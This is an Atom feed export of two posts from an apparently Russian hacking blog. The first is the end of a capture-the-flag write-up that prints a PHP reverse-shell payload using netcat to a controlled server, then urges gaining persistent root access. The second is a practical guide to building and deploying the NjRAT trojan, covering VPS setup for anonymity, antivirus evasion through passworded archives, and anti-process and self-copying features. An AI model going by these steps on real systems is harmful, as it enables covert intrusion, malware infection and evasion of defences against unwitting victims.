    &lt;img src=&quot;https://img3.teletype.in/files/6e/83/6e834ea9-94ee-4a9c-86d2-c2e0d40b6349.png&quot; width=&quot;1920&quot; /&gt;
    &lt;figcaption&gt;Команда cat&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;bZFJ&quot;&gt;Ну и почитав содержимое файла, видим здесь наш флаг (выделен мышкой).&lt;/p&gt;
  &lt;figure id=&quot;4KhP&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img4.teletype.in/files/b7/bd/b7bdf0e9-597d-46f0-b151-6848cc45d80f.png&quot; width=&quot;1920&quot; /&gt;
    &lt;figcaption&gt;Флаг в php файле сайта&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;2d9C&quot;&gt;В реальности же изучать файлы сайта очень важно для нахождения различных api, логинов и паролей от баз данных, скрытых комментариев и так далее.&lt;/p&gt;
  &lt;h3 id=&quot;w8e0&quot;&gt;Получаем netcat shell в терминале&lt;/h3&gt;
  &lt;p id=&quot;XxXt&quot;&gt;И так, задачка решена, но, на самом деле можно получить удаленный доступ к серверу и с помощью привычного терминала. Для этого создадим другой payload со &lt;a href=&quot;https://t.me/hunterghoulchat/31&quot; target=&quot;_blank&quot;&gt;следующим&lt;/a&gt; содержимым:&lt;/p&gt;
  &lt;p id=&quot;Tj4c&quot;&gt;&lt;code&gt;&amp;lt;?php system(&amp;quot;nc -nv ip_нашего_сервера 4444 -e /bin/bash&amp;quot;);?&amp;gt;&lt;/code&gt;&lt;/p&gt;
  &lt;figure id=&quot;XErm&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img2.teletype.in/files/54/cf/54cf3d8d-d02a-4e25-b8bc-285f2e5f6607.png&quot; width=&quot;807&quot; /&gt;
    &lt;figcaption&gt;Наш payload&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;F3sW&quot;&gt;Разберем кратко что тут есть:&lt;/p&gt;
  &lt;ol id=&quot;0rOJ&quot;&gt;
    &lt;li id=&quot;4irZ&quot;&gt;nc -nv - запускает программу netcat, которая выполнит запрос по следующему далее ip и порту&lt;/li&gt;
    &lt;li id=&quot;vlZc&quot;&gt;90.156.x.x - ip адрес нашего арендованного VPS (ну или наш если мы оформили статический/белый ip у нашего интернет-провайдера)&lt;/li&gt;
    &lt;li id=&quot;rcb6&quot;&gt;4444 - порт, по которому будет подключаться удаленный сервер к нашему серверу. Может быть любой не занятый, например 1604 или 1111, главное чтобы на обоих серверах он был свободен, не блокировался файрволлом и был одинаковый.&lt;/li&gt;
    &lt;li id=&quot;HVir&quot;&gt;-e /bin/bash - тут мы просим после установления подключения запустить оболочку bash, которая у всех linux по умолчанию есть. Если нет, то можно заменить на например /bin/sh &lt;/li&gt;
  &lt;/ol&gt;
  &lt;p id=&quot;ukCv&quot;&gt;Сохраняем payload на нашем сервере, копируем ссылку на него, и далее снова на нашем сервере выполняем следующую команду:&lt;/p&gt;
  &lt;p id=&quot;Vrrm&quot;&gt;&lt;code&gt;nc -lvnp 4444&lt;/code&gt;&lt;/p&gt;
  &lt;figure id=&quot;1mEL&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img2.teletype.in/files/19/06/1906af5e-403e-45e5-80ce-514f32144cf8.png&quot; width=&quot;822&quot; /&gt;
    &lt;figcaption&gt;Запускаем лисенер (прослушивалку трафика)&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;wAXr&quot;&gt;Здесь мы говорим нашему серверу ждать, пока кто-то к нам подключится по порту 4444 (или по другому, который мы вписали в payload. Главное чтобы был одинаковый).&lt;/p&gt;
  &lt;p id=&quot;WhC8&quot;&gt;Ну что, зашлем снова ссылку на наш payload серверу и увидим, что он как бы &amp;quot;завис&amp;quot; в обработке нашего запроса:&lt;/p&gt;
  &lt;figure id=&quot;DfyU&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img1.teletype.in/files/03/1e/031ee20f-ecc5-4791-adb7-5df4774af7c9.png&quot; width=&quot;1920&quot; /&gt;
    &lt;figcaption&gt;Установленное подключение. Выглядит как &amp;quot;зависший&amp;quot; запрос сервера.&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;8d0P&quot;&gt;Проверяем терминал нашего сервера и ура - видим успешное подключение к серверу. Сразу введем следующие команды:&lt;/p&gt;
  &lt;ol id=&quot;AzAM&quot;&gt;
    &lt;li id=&quot;V9xH&quot;&gt;&lt;code&gt;id&lt;/code&gt; - посмотрим от имени какого пользователя мы получили доступ&lt;/li&gt;
    &lt;li id=&quot;vRNQ&quot;&gt;&lt;code&gt;script /dev/null -c bash&lt;/code&gt; - здесь мы делаем более удобную для себя оболочку. Такой как бы псевдо-bash, чтобы мы видели в какой папке находимся и от имени какого пользователя, хоть это и не заменяет полноценного подключения к оболочке, например по ssh.&lt;/li&gt;
  &lt;/ol&gt;
  &lt;figure id=&quot;ZPJw&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img2.teletype.in/files/9d/77/9d77aa08-2346-445c-b1c1-d4c4a9f06540.png&quot; width=&quot;798&quot; /&gt;
    &lt;figcaption&gt;Успешное получение удаленного shell&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;g9i4&quot;&gt;Выполним каких-нибудь пару команд:&lt;/p&gt;
  &lt;figure id=&quot;VGWX&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img2.teletype.in/files/14/b2/14b2294f-0979-459e-aad3-b1f392cf2617.png&quot; width=&quot;812&quot; /&gt;
    &lt;figcaption&gt;Видим не назначенную домашнюю директорию и наличие группы пользователей sudo&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;vk94&quot;&gt;Здесь видим что есть установленная программа sudo - с её помощью можно было бы попробовать получить полный доступ над сервером, например с помощью команды: &lt;code&gt;sudo -i&lt;/code&gt;. Но это не этот случай.&lt;/p&gt;
  &lt;p id=&quot;Qw2C&quot;&gt;Здесь мы можем вывести содержимое того же файла и получить флаг:&lt;/p&gt;
  &lt;figure id=&quot;1V93&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img1.teletype.in/files/cd/50/cd50b52d-7014-4cef-9da8-0d51dba31240.png&quot; width=&quot;878&quot; /&gt;
    &lt;figcaption&gt;Получение флага в терминале&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;h3 id=&quot;AjOD&quot;&gt;Выводы&lt;/h3&gt;
  &lt;p id=&quot;oVzt&quot;&gt;При взломе web-приложения следует начать с попыток осмыслить принцип работы тех или иных его функций, отвечающих за выполнение каких-то операций на web-сервере.&lt;/p&gt;
  &lt;p id=&quot;7LiI&quot;&gt;Взлом web-приложения может быть осуществлён как с помощью манипуляции с запросами (как например в одной из прошлых &lt;a href=&quot;https://t.me/hunterghoul_team/24&quot; target=&quot;_blank&quot;&gt;статей&lt;/a&gt;), так и с помощью более сложных атак, как в данном случае. &lt;/p&gt;
  &lt;p id=&quot;AlP1&quot;&gt;В любом случае после успешного взлома и получения доступа к терминалу удаленного сервера, постарайтесь проанализировать файлы сайтов, программу sudo и прочие возможности закрепиться в системе.&lt;/p&gt;
  &lt;p id=&quot;5RoU&quot;&gt;Запомните, основная задача при проведении атаки - открыть себе постоянный удаленный доступ, в идеале найдя логин:пароль или создав нового пользователя с root правами для подключения по ssh.&lt;/p&gt;
  &lt;p id=&quot;fuWF&quot;&gt;Благодарю за прочтение статьи.&lt;/p&gt;

</content></entry><entry><id>hunterghoul_team:rat</id><link rel="alternate" type="text/html" href="https://teletype.in/@hunterghoul_team/rat?utm_source=teletype&amp;utm_medium=feed_atom&amp;utm_campaign=hunterghoul_team"></link><title>RAT, NAT и прослушка - получаем удаленный доступ к ПК.</title><published>2024-10-28T11:34:07.356Z</published><updated>2024-10-28T11:34:07.356Z</updated><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://img2.teletype.in/files/5e/fc/5efc69c0-a42b-48a1-ad90-70eda95864e9.png"></media:thumbnail><category term="hacking" label="Hacking"></category><summary type="html">&lt;img src=&quot;https://img4.teletype.in/files/b1/7e/b17e3537-fb02-41b3-98f4-ea3463c0d2b8.png&quot;&gt;Remote access trojan (RAT, от англ. Троян удаленного доступа) - троян, предоставляющий атакующему удаленный доступ к информационной системе. Как правило ратники (так называют в обиходе данные вирусы) делятся по системам: для Android, IOS, Windows. Есть платные и бесплатные, с закрытым и открытым кодом. Мы с вами посмотрим на один из примеров данной программы дабы разобраться, как оно работает, на все подводные камни данной штуки.</summary><content type="html">
  &lt;h3 id=&quot;Rch8&quot;&gt;Введение&lt;/h3&gt;
  &lt;p id=&quot;pCi6&quot;&gt;Remote access trojan (RAT, от англ. Троян удаленного доступа) - троян, предоставляющий атакующему удаленный доступ к информационной системе. Как правило ратники (так называют в обиходе данные вирусы) делятся по системам: для Android, IOS, Windows. Есть платные и бесплатные, с закрытым и открытым кодом. Мы с вами посмотрим на один из примеров данной программы дабы разобраться, как оно работает, на все подводные камни данной штуки.&lt;/p&gt;
  &lt;h3 id=&quot;PNUR&quot;&gt;Дисклеймер&lt;/h3&gt;
  &lt;p id=&quot;5Iil&quot;&gt;Действия показанные в данной статье караются законом, вся описанная информация несёт исключительно образовательный характер. Не пытайтесь применять это на практике.&lt;/p&gt;
  &lt;h3 id=&quot;XDd5&quot;&gt;Глава 1 - кажется что-то не работает.&lt;/h3&gt;
  &lt;p id=&quot;kfK8&quot;&gt;И так, как я уже ранее и сказал, наша цель - получить удаленный доступ к компьютеру жертвы. В моем примере жертвой будет мой компьютер, а админом - арендованный Windows Server.&lt;/p&gt;
  &lt;p id=&quot;Li8T&quot;&gt;Но почему так? А всё просто, и сейчас я тебе объясню что будет, если ты попытаешься со своего компа заслать вирус жертве.&lt;/p&gt;
  &lt;figure id=&quot;qfkZ&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img4.teletype.in/files/b1/7e/b17e3537-fb02-41b3-98f4-ea3463c0d2b8.png&quot; width=&quot;1080&quot; /&gt;
    &lt;figcaption&gt;NAT - network address translation (преобразование сетевых адресов)&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;d45H&quot;&gt;В далеком бородатом году, когда люди стали подключаться к глобальной сети интернет, протокол идентификации сетевых устройств (ip; internet protocol от англ. межсетевой протокол) 4 версии имел достаточно ограниченное количество адресов - 4 294 967 296. Т.е. всего интернетом могло пользоваться чуть более 4-х миллиардов устройств. Но так уж вышло, что люди подсели на порнушку, аську и прочие приколюхи, что-то вроде донатов на наноферму (а могли бы мне донатить) и так далее. И вот, семь миллиардов человек по приблизительному подсчету, стали стремительно поглощать интернет. А тут ещё и всякие провайдеры, дата-центры и прочие корпоративные коридоры серверов стали мгновенно сжирать все запасы адресов. И тут &lt;a href=&quot;https://ru.wikipedia.org/wiki/%D0%98%D0%BD%D0%B6%D0%B5%D0%BD%D0%B5%D1%80%D0%BD%D1%8B%D0%B9_%D1%81%D0%BE%D0%B2%D0%B5%D1%82_%D0%98%D0%BD%D1%82%D0%B5%D1%80%D0%BD%D0%B5%D1%82%D0%B0&quot; target=&quot;_blank&quot;&gt;IETF&lt;/a&gt; (Инженерный совет Интернета) начал понимать, что такими темпами интернет закончится и новые пользователи не смогут подключиться к вообще-то ИНТЕРНАЦИОНАЛЬНОЙ сети, т.е. к мировой. А значит она уже станет не такой уж и мировой и всей этой утопичной идее придет конец. &lt;/p&gt;
  &lt;p id=&quot;0PtE&quot;&gt;Тогда людям пришло в голову одновременно две гениальные вещи:&lt;/p&gt;
  &lt;ol id=&quot;6mrK&quot;&gt;
    &lt;li id=&quot;cbTH&quot;&gt;Расширить количество адресов. Таким образом ipv4 заменил ipv6. Или не заменил? Ну, в целом идея была хороша - ибо в 6 версии протокола ip таких уникальных адресов стало бы аж &lt;strong&gt;340 282 366 920 938 000 000 000 000&lt;/strong&gt;. Но, технически перевести всю аппаратуру на новую версию протокола сложно, а потому, данный процесс медленно пытается по сей день двигаться.&lt;/li&gt;
    &lt;li id=&quot;P4Rf&quot;&gt;Методы делегирования адресов. Тут всем на помощь пришла популярная метода NAT.&lt;/li&gt;
  &lt;/ol&gt;
  &lt;p id=&quot;kj9P&quot;&gt;И так, если с ipv6 всё понятно, то в чем суть NAT.&lt;/p&gt;
  &lt;p id=&quot;3CkJ&quot;&gt;Вы подписываете договор на подключение с вашим провайдером. Далее провайдер подключает свой провод к вашему... пк? роутеру? Кто знает...&lt;/p&gt;
  &lt;p id=&quot;XiWh&quot;&gt;И тут есть нюанс:&lt;/p&gt;
  &lt;ol id=&quot;UyCj&quot;&gt;
    &lt;li id=&quot;W9J4&quot;&gt;Подключение по этому проводу провайдера между тобой и провайдером происходит по протоколу PPPoE. По сути это такой протокол, при котором чтобы тебе подключиться к интернету провайдера, нужно иметь логин и пароль. Можно ли подрезать кабель и сбрутить акк? Хз, не пробовал) но вполне возможно.&lt;/li&gt;
    &lt;li id=&quot;wnJa&quot;&gt;Подключение между тобой и провайдером идёт по протоколу DHCP. Здесь в таком случае если сосед спиздит у тебя провод и воткнет себе, то у него будет работать интернет, ибо никаких логинов и паролей для этого не надо. Надежно? - да пиздец.&lt;/li&gt;
  &lt;/ol&gt;
  &lt;p id=&quot;Xp4y&quot;&gt;Ну вот мы подписали договор, идёт у нас электрический ток по интернет кабелю, присылаются единички (0.5-1v) и нули (&amp;lt;0.5v), компьютер/роутер считывает данные сигналы и преобразует их в соответствующие кадры, пакеты и т.д. - всё как завещала модель &lt;a href=&quot;https://ru.wikipedia.org/wiki/%D0%A1%D0%B5%D1%82%D0%B5%D0%B2%D0%B0%D1%8F_%D0%BC%D0%BE%D0%B4%D0%B5%D0%BB%D1%8C_OSI&quot; target=&quot;_blank&quot;&gt;OSI&lt;/a&gt;.&lt;/p&gt;
  &lt;p id=&quot;jL3v&quot;&gt;Далее, ответьте на простой вопрос - куда идёт весь ваш трафик когда вы заходите на свой любимый &lt;a href=&quot;https://otvet.mail.ru/question/222816714&quot; target=&quot;_blank&quot;&gt;оранжевый ютуб&lt;/a&gt;?&lt;/p&gt;
  &lt;p id=&quot;zovy&quot;&gt;Раньше, ваш запрос бы шёл НАПРЯМУЮ на ip адрес сервера сайта, к которому вы обратились. Этот ip называется белый ip, или - статический. Т.е. вам выделен один конкретный ip адрес по договору с вашим провайдером.&lt;/p&gt;
  &lt;p id=&quot;uroN&quot;&gt;Но так как сейчас беда и этих белых адресов не хватает, то его закупает себе контора провайдеров, подключает с ПРЯМЫМ выходом в интернет свои главные сервера, а дальше создаёт большую, тернистую и страшную локальную сеть, к которой подключены их серваки для распределения нагрузки, фильтрации трафика, прослушки, и где-то там в конце, наконец, подключены по договору мы, их клиенты. Такой ip называется серым, локальным, может быть динамическим и статическим, но чаще динамический. Он внутренний локальный. Т.е. поймите главную вещь - в интернет выходим не мы, а наш провайдер. Через него идёт весь трафик и направляется нам.&lt;/p&gt;
  &lt;figure id=&quot;6Emk&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img3.teletype.in/files/27/ce/27ce028b-003e-4b25-9135-962695293e18.png&quot; width=&quot;1101&quot; /&gt;
    &lt;figcaption&gt;Серые ip (мы) - белые ip (сервера, сайты и т.д.)&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;0KHP&quot;&gt;Такая схема очень напоминает атаку посередине - т.е. когда между тобой и твоим собеседником стоит некая темная личность, которая может исказить то что ты говоришь, и обратно, сказать тебе то, что тебе не говорили. Или вообще ничего не сказать, что называется у нас блокировкой сайтов).&lt;/p&gt;
  &lt;figure id=&quot;198j&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img3.teletype.in/files/6a/0f/6a0ffc2d-80ca-4035-9416-4079c3705e9a.png&quot; width=&quot;900&quot; /&gt;
    &lt;figcaption&gt;Атака &amp;quot;человек посередине&amp;quot; - MITM.&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;DZrl&quot;&gt;А теперь возвращаемся к сути вопроса - как жертва подключится к нам, т.е. предоставит удаленный доступ? Ответ - никак. Ну, или почти никак. Всё что она будет, так это стучать на наш внутренний ip адрес (которого нет публично в сети Интернет), либо стучать на публичный ip адрес нашего провайдера, который мы можем посмотреть, зайдя например &lt;a href=&quot;https://2ip.ru/&quot; target=&quot;_blank&quot;&gt;сюда&lt;/a&gt;.&lt;/p&gt;
  &lt;p id=&quot;stw4&quot;&gt;На своем примере ниже показываю как это выглядит:&lt;/p&gt;
  &lt;figure id=&quot;ahRI&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img1.teletype.in/files/8a/ec/8aece70a-7c64-48b0-bc47-e4424c4bc457.png&quot; width=&quot;1181&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;FKro&quot;&gt;Слева где замазанный ipv4 - это ip, назначенный провайдером. Справа - это ip сервера провайдера, к которому я подключен по своему локальному ip типа 10.34.x.x. Вот тот что справа (95.83.x.x) посылает запрос на сайты, получает ответ и переадресовывает мне, на мой локальный ip 10.34.x.x.&lt;/p&gt;
  &lt;p id=&quot;Pm1A&quot;&gt;Вот так работает интернет. Так что зараженный пк нашим ратником на данном этапе будет долбиться лбом об стену (ну или об пол, призывая &lt;s&gt;бога&lt;/s&gt; антивирус).&lt;/p&gt;
  &lt;h3 id=&quot;EAJ4&quot;&gt;Глава 2 - чиним наш интернет.&lt;/h3&gt;
  &lt;p id=&quot;hGEr&quot;&gt;Разобравшись с проблемой поговорим о способах решения и о других попутных проблемах:&lt;/p&gt;
  &lt;ol id=&quot;UFVY&quot;&gt;
    &lt;li id=&quot;xP6p&quot;&gt;Запрос на выделение статического ip адреса. Звоним нашему провайдеру и просим дать нам выделенный ip адрес. Как правило большинство провайдеров за дополнительную стоимость без проблем предоставят вам белый ip адрес. На него то вы и будете клипать ваш вирус. Какие проблемы? - то что жертва при должной сноровке увидит, что некий подозрительный файл стучится по такому-то ip адресу. И этот ip адрес конечно же будет ВАШ). Ну а дальше останется только надеть маску анонимуса, оставить ключики под ковриком и ждать БСТМ.&lt;/li&gt;
    &lt;li id=&quot;WX1z&quot;&gt;Backend на хостинге. Да, можно написать backend часть на например &lt;a href=&quot;https://www.php.net/&quot; target=&quot;_blank&quot;&gt;php&lt;/a&gt;, и указать вашему rat стучаться на ваш сайт к этому файлу, который бы ретранслировал соединения на ваш комп с запущенной админкой. Стильно, модно, по хакерски.&lt;/li&gt;
    &lt;li id=&quot;mUW7&quot;&gt;Аренда VPS. Этот способ я сегодня вам и покажу, потому как он менее затратный, не требует знаний backend разработки, да и вообще для нубасиков вроде меня самое то. Здесь мы получаем систему с уже белым ip, не нашим, к которому злоумышленник бы подключался по vpn, тем самым обезопасив себя от &lt;a href=&quot;https://skillbox.ru/media/code/deanon-i-doksing-kak-khakery-raskryvayut-lichnosti-polzovateley-v-ceti/&quot; target=&quot;_blank&quot;&gt;деанона&lt;/a&gt;.&lt;/li&gt;
  &lt;/ol&gt;
  &lt;p id=&quot;8Gev&quot;&gt;И так, погнали реализовывать третий пункт.&lt;/p&gt;
  &lt;p id=&quot;rfq4&quot;&gt;Первое что сделаем - зарегаем аккаунт на &lt;a href=&quot;https://www.google.com/search?q=vps+windows+server&quot; target=&quot;_blank&quot;&gt;каком-нибудь VPS&lt;/a&gt; и потратим пару шекелей на счёт.&lt;/p&gt;
  &lt;figure id=&quot;RulN&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img4.teletype.in/files/72/f9/72f9f671-99f7-4b4f-b666-a1a6be5dde5b.png&quot; width=&quot;632&quot; /&gt;
    &lt;figcaption&gt;Арендованный сервер&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;8eKn&quot;&gt;После того как мы регнули акк и пополнили счёт (в некоторых местах можно криптой пополнить, что удобно) - арендовываем windows server. &lt;/p&gt;
  &lt;p id=&quot;w9Hl&quot;&gt;Лично я выбрал такие параметры: Windows Server 2022 RAM 4GB Хранилище 60GB Процессор 2 Ядра.&lt;/p&gt;
  &lt;p id=&quot;Cpzk&quot;&gt;Вот, теперь нам нужно подключиться к нему. В Windows есть встроенная утилита &amp;quot;Подключение к удаленному рабочему столу&amp;quot;.&lt;/p&gt;
  &lt;figure id=&quot;RmDG&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img4.teletype.in/files/70/1b/701be585-2e54-47ca-835e-b9ecc866911e.png&quot; width=&quot;531&quot; /&gt;
    &lt;figcaption&gt;Программка на Windows для RMS.&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;Yg9V&quot;&gt;На линуксе можно установить &lt;a href=&quot;https://remmina.org/&quot; target=&quot;_blank&quot;&gt;Remmina&lt;/a&gt; или любой другой RMS на выбор.&lt;/p&gt;
  &lt;p id=&quot;Qk8L&quot;&gt;RMS (Remote Manipulator System - удаленное администрирование системой). Не троян, носит легальный характер доступа к удаленному пк, типо как тот же SSH.&lt;/p&gt;
  &lt;p id=&quot;o5Cn&quot;&gt;Вводим ip от нашего сервака, логин и пароль. И видим рабочий стол арендованой винды.&lt;/p&gt;
  &lt;figure id=&quot;qTRQ&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img3.teletype.in/files/24/9a/249a4955-8841-4df8-acef-c78d3208ee59.png&quot; width=&quot;1919&quot; /&gt;
    &lt;figcaption&gt;Рабочий стол Windows Server 2022 (программа Windows Server).&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;x0K5&quot;&gt;Здесь нас встречает встроенная прога на windows server - она нам понадобится чтобы установить некоторые зависимости.&lt;/p&gt;
  &lt;p id=&quot;84dc&quot;&gt;Нам нужно тыкнуть здесь вот сюда:&lt;/p&gt;
  &lt;figure id=&quot;rR3h&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img3.teletype.in/files/e4/81/e481af92-d341-4345-9a11-f1da3127b25c.png&quot; width=&quot;1912&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;za9z&quot;&gt;В открывшемся окне жмем next до момента, пока не дойдем до Features:&lt;/p&gt;
  &lt;figure id=&quot;7NUt&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img1.teletype.in/files/85/fe/85fe0d20-d9bb-45a5-a2c0-fec56db9c4ca.png&quot; width=&quot;975&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;0Pm4&quot;&gt;Здесь ставим первую галочку (устанавливаем .NET Framework 3.5.). Ну и в целом готово, далее по вкусу можно русифицировать систему. Жмякаем next, далее на кнопку install и пойдет процесс установки зависимостей.&lt;/p&gt;
  &lt;p id=&quot;8WP1&quot;&gt;По окончании нас встретит такое окно, означающее окончание установки:&lt;/p&gt;
  &lt;figure id=&quot;B5vM&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img3.teletype.in/files/6b/43/6b434541-04ed-494e-a825-3c44161a3a06.png&quot; width=&quot;967&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;NX1H&quot;&gt;Это окно и прогу можно закрывать.&lt;/p&gt;
  &lt;p id=&quot;6joe&quot;&gt;Теперь берем наш билдер (генератор вируса), нажимаем ctrl+c, заходим в окно с windows сервер, и вставляем туда, ctrl+v. Всё, у нас через инет закачается наш билдер. Заранее через winrar сделайте sfx архив с паролем, чтобы нигде антивир ничего не удалил, и предварительно отключите их у себя и на windows server.&lt;/p&gt;
  &lt;p id=&quot;saA2&quot;&gt;Поискав несколько ратников, нашел вот этот рабочий - &lt;a href=&quot;https://github.com/BlackAll9/NjRat.0.7D&quot; target=&quot;_blank&quot;&gt;NjRAT&lt;/a&gt;.&lt;/p&gt;
  &lt;p id=&quot;Pimy&quot;&gt;Запускаем Danger edition и видим такое окно:&lt;/p&gt;
  &lt;figure id=&quot;SLqf&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img2.teletype.in/files/90/89/90897f55-4a16-4d7e-83b5-2e3e72654089.png&quot; width=&quot;1009&quot; /&gt;
    &lt;figcaption&gt;Окно NjRat&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;s5bL&quot;&gt;Там где порт - указываем любой порт, который не будет занят. Обычно это между 1000 и 10000. Например выберем тот порт с которого я познакомился с ратниками, ещё когда по юпупам гуляли видосы про &lt;a href=&quot;https://www.youtube.com/watch?v=rIbsXQc2Pe0&amp;pp=ygUXZGFyayBjb21ldCByYXQg0YPQs9Cw0YA%253D&quot; target=&quot;_blank&quot;&gt;darkcometrat&lt;/a&gt; - 1604. Пароль поставим 12345.&lt;/p&gt;
  &lt;figure id=&quot;87gv&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img1.teletype.in/files/80/19/80191cc0-b27b-4b3d-bcde-d2f9413e9ca7.png&quot; width=&quot;1006&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;BwpR&quot;&gt;Жмем Save и Start&lt;/p&gt;
  &lt;p id=&quot;7SJK&quot;&gt;Теперь у нас прослушивается трафик на 1604 порту. Нам надо создать вирус, который бы на него стучался. Т.е. стучался на нашip:нашport. В моем случае это будет 150.241.91.82:1604.&lt;/p&gt;
  &lt;p id=&quot;TPp6&quot;&gt;Для этого жмем внизу проги на слово-ссылку &lt;code&gt;builder&lt;/code&gt;.&lt;/p&gt;
  &lt;figure id=&quot;JG52&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img2.teletype.in/files/dd/27/dd270528-45dd-4058-a6ea-cacc66732d01.png&quot; width=&quot;1271&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;AMCq&quot;&gt;У нас откроется такое окно и даа.. - у вас откроется тромб от увиденного разнообразия и непонимания всего происходяего.. ща всё в краце поясню.&lt;/p&gt;
  &lt;figure id=&quot;HP8z&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img4.teletype.in/files/b7/ff/b7ff4f3f-a371-42c7-935a-654c5e3ef9fc.png&quot; width=&quot;771&quot; /&gt;
    &lt;figcaption&gt;Картина Репина - инфаркт жопы.&lt;/figcaption&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;WLhc&quot;&gt;Ну первым делом Host и порт - здесь вместо локального ip по-умолчанию (127.0.0.1) вставляем наш, тот, по которому мы подключились к серваку. В моем случае это 150.241.91.82.&lt;/p&gt;
  &lt;p id=&quot;6XtW&quot;&gt;Далее галочка Kill Anti Process и Copy Directory включает нам следующие окошки:&lt;/p&gt;
  &lt;figure id=&quot;ptYh&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img1.teletype.in/files/82/a4/82a47083-0792-4c80-950e-be382874e2b0.png&quot; width=&quot;818&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;xjcP&quot;&gt;Анти-процесс - закрывает указанные проги которые мы выбрали. То есть наш ратник следит за процессами в системе, и как только видит какой-то из выбранных нами - сразу же его убивает. Это позволяет бороться с установщиками антивирусов и прочими прогами, которые могут спалить нас или наш ратник.&lt;/p&gt;
  &lt;p id=&quot;kx4h&quot;&gt;Копирование в директории - просто копирует наш вирус во многие места, чтобы его было тяжелей найти и удалить.&lt;/p&gt;
  &lt;p id=&quot;SxFX&quot;&gt;Остальные функции не так интересны, так что, оставим всё выключенным для теста, единственное только добавим наш хост, введя ip нашего сервера и нажав на кнопку &lt;code&gt;Added&lt;/code&gt;.&lt;/p&gt;
  &lt;figure id=&quot;RqSD&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img3.teletype.in/files/ea/18/ea186a70-5f74-4aa1-97fe-eb73d56ae662.png&quot; width=&quot;1339&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;5kML&quot;&gt;После этого у нас появится наш зашифрованный паролем хост и кнопка Build, на которую мы жмякаем и собираем ратник.&lt;/p&gt;
  &lt;figure id=&quot;ZDZr&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img2.teletype.in/files/59/ce/59ce3e2c-7d75-4617-9d84-777e12b7d1ca.png&quot; width=&quot;1437&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;TkCZ&quot;&gt;Готово. Наш вирус создан, и теперь пробуем закинуть его себе на комп (но лучше не быть экстремалом как я, а загрузить его на виртуалку) и протестить&lt;/p&gt;
  &lt;p id=&quot;3N4J&quot;&gt;Но, после запуска ничего не случилось - поэтому на сервере пришлось отключить файрвол чтобы всё заработало:&lt;/p&gt;
  &lt;figure id=&quot;jsVm&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img1.teletype.in/files/0a/0c/0a0c3a98-4b6e-4c78-9e02-1e3049ebd85d.png&quot; width=&quot;1165&quot; /&gt;
  &lt;/figure&gt;
  &lt;figure id=&quot;Fn0a&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img3.teletype.in/files/e7/59/e759e643-f129-4b53-be07-58cfc7db986f.png&quot; width=&quot;1010&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;DQh3&quot;&gt;На самом деле конечно отключать его не стоит, достаточно просто пробросить наш порт в настройках файрвола, но мы не будем этим сейчас запариваться.&lt;/p&gt;
  &lt;h3 id=&quot;R9pN&quot;&gt;Глава 3 - функционал.&lt;/h3&gt;
  &lt;p id=&quot;ovrd&quot;&gt;И так, для примера я повторил это всё во второй проге из папки с ратниками, и вот что вышло:&lt;/p&gt;
  &lt;figure id=&quot;I9HY&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img3.teletype.in/files/ef/a5/efa55488-f7ad-4c14-8e1c-51540d56f30c.png&quot; width=&quot;1052&quot; /&gt;
  &lt;/figure&gt;
